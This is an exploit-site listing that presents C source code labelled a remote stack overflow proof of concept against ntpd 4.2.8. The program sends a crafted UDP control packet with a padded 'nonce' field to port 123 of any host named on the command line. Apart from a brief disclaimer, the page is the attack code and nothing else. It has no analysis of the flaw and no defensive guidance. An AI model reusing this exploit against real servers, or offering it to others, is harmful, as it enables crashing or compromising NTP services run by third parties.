ntpd 4.2.8 Stack Overflow Proof Of Concept



EKU-ID: 6112 CVE: OSVDB-ID:
Author: N_A Published: 2016-12-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*

Remote ntpd 4.2.8 Stack Over Flow Proof Of Concept Exploit by N_A , N_A[at]tutanota.com
Please use this code to test your own servers. Do not break the law. Do not misuse. I am not responsible for any
misuse of this code


N_A[at]tutanota.com

*/

 


#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <netinet/in.h>
#include <string.h>
#include <netdb.h>


#define PORT 123  /* change if needed */


  /* & nonce exploit packet , Todor Donev  */
char packet[] ="\x26\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x6e\x6f\x6e\x63\x65\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61";

 

void err(char *msg);

int main(int argc, char *argv[])

{
 int sockfd,n;

 struct sockaddr_in vuln;
 struct hostent *server;

 char *hostname;

 if(argc != 2)
 {
  printf("==================================================\n");
  printf("\tntpd 4.2.8 remote stack overflow exploit\n");
  printf("\t\tBy N_A\n");
  printf("\tUSAGE: %s [HOST]\n", argv[0]);
  printf("\t%s 127.0.0.1\n", argv[0]);
  printf("==================================================\n");
  return EXIT_FAILURE;
 }


 hostname = argv[1];
 server = gethostbyname(hostname);

 if( server == NULL )
 {
  err("gethostbyname");
 }


 if ((sockfd = socket(AF_INET,SOCK_DGRAM,0)) < 0 )
 {
  err("socket()");
 }

 printf("\n[*]UDP socket() successful\n");

 bzero((char *)&vuln,sizeof(vuln));
 vuln.sin_family = AF_INET;
 bcopy((char *)server->h_addr,(char *)&vuln.sin_addr.s_addr,server->h_length);
 vuln.sin_port = htons(PORT);

 if((n = sendto(sockfd,packet,strlen(packet),0,(struct sockaddr *)&vuln,sizeof(vuln))) < 0 )
 {
  err("sendto()");
 }

 printf("\n\n=============================\n");
 printf("\nPacket sent to server!\n");
 printf("=============================\n\n");

 return EXIT_SUCCESS;
}

 

void err(char *msg)
{
 perror(msg);
 exit(0);
}